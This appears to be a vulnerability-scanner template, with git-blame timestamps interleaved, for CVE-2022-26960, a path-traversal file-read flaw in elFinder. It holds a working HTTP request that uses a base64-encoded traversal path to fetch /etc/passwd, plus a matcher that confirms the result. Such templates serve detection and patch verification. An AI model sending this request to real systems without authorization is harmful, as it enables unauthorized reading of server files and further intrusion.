2022-06-30 23:31:46 +00:00
id : CVE-2022-26960
info :
2022-07-05 17:21:14 +00:00
name : elFinder <=2.1.60 - Local File Inclusion
2022-06-30 23:31:46 +00:00
author : pikpikcu
2022-07-04 12:56:40 +00:00
severity : critical
2022-06-30 23:31:46 +00:00
description : |
2022-07-05 17:21:14 +00:00
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
2022-06-30 23:31:46 +00:00
reference :
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
2022-07-04 12:56:40 +00:00
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
- https://www.synacktiv.com/publications.html
2022-07-05 17:21:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
2022-07-04 12:56:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score : 9.1
cve-id : CVE-2022-26960
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
epss-score : 0.93908
2022-07-04 12:32:11 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-06 09:08:13 +00:00
verified : true
2022-06-30 23:31:46 +00:00
tags : cve,cve2022,lfi,elfinder
2023-04-27 04:28:59 +00:00
http :
2022-06-30 23:31:46 +00:00
- raw :
- |
2022-07-04 12:32:11 +00:00
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
2022-06-30 23:31:46 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0:"
2022-07-04 12:32:11 +00:00
- type : status
status :
- 200